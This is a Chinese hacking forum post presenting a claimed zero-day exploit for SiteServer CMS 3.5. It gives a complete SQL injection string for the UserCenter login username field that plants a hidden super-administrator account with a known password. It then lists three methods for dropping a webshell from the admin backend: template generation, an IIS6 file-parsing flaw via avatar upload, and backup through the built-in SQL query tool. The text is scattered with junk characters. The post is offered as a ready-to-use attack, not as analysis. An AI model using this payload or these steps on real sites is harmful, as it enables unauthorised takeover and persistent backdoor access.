找回密码
 立即注册
查看: 2954|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版2 ~+ J# N& o: F. a0 ^+ h

! U8 W, K9 P# u2 C+ s7 Wstieserver官网:www.siteserver.cn
/ M7 o, f% n) N6 l. M
4 F4 q6 ]- S2 N0 s% V* F
; T0 E7 _; G; |  }
: @/ p- k3 Y, g* `. y! f* pEXP:. b  ~1 e; g& {2 a9 I2 L6 c
3 p% o+ C0 T6 {. L5 {- m
直接访问UserCenter/login.aspx
- F+ j6 K4 ~* _7 p2 V' V; T4 O% U$ L( B

7 L# v$ l1 r  z) E/ C( h/ N$ T0 L/ W, I* w7 k$ s1 a9 k0 p) t, T
用户名处输入:
; F& @) T) A( \
- }- R; U; o6 }123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
0 m3 H/ J* v; h* F6 S( C( z
+ V& N) x5 {% ?# I; `2 D
& m: p) }6 r+ D0 D; d; W( ]
$ S/ n  O' p0 h6 J/ w# V) v2 b. V密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
* y  E  s7 M2 i" j7 k  u( T
. g0 R# W) n# g* _7 M# r' {
8 x6 p/ a% \9 _$ }8 N0 x+ d, l* Q: A* k. u. _' n
之后再访问后台SiteServer/login.aspx用插入的用户登陆
4 K6 K  N4 m/ ^$ u
6 H8 y+ q3 r) }1 Z& Y ! l1 E/ f' l% m) E% X; R
" `& C# m/ b) P4 e
后台拿webshell的三种方法:! |0 z/ z% x, U3 ?

- ?9 r$ C; w7 Z6 f) A! Q1 C" k1 Y7 ^一、7 H9 m% C% J& h9 A8 T

9 S8 g' D2 L) X: G: d; H8 T$ ?) n$ }站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
( X: v! Q* t0 I9 Q7 A
, Q; u$ D( G; a' ~. P# l二、) Z( K  G( p; r/ c. ~# R8 G
' K9 }) w7 @/ Y4 Y% P& q; Y$ o1 f
成员权限-》添加用户-》用户名为:1.asp0 q) R& H' K6 K4 C! x
) G, c5 Z7 V- ^
http://127.0.0.1/usercenter/
  G6 o$ ^$ Y. }2 I7 G9 N: v2 q! f* _. i/ l8 y4 `& M
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell5 x. n/ d+ F- M" Q: r. y) D  t
/ I  {: B+ d: p; B% q
(ps:后台添加用户时不会验证是否含有非法字符)- D) H7 b! Y4 w# \
; F0 S, t; Z! I7 S
三、
* V6 ?; L$ B! C: W8 |& ~2 d
( W8 }$ A/ Z. c: q: [" |5 c系统工具-》实用工具-》机器参数查看
. ?9 V! m3 V5 k' x5 Q" j% G可以看到数据库类型、名称,WEB路径
5 I& D6 P9 ?! Q7 ~. Z6 V" g' |
+ P6 c; t6 d* ]. A系统工具-》数据库工具-》SQL语句查询
0 K  E" O: N  v* g这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。6 \  ^  \# u6 O7 P8 W0 q8 `

  F) m% E# i* j
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表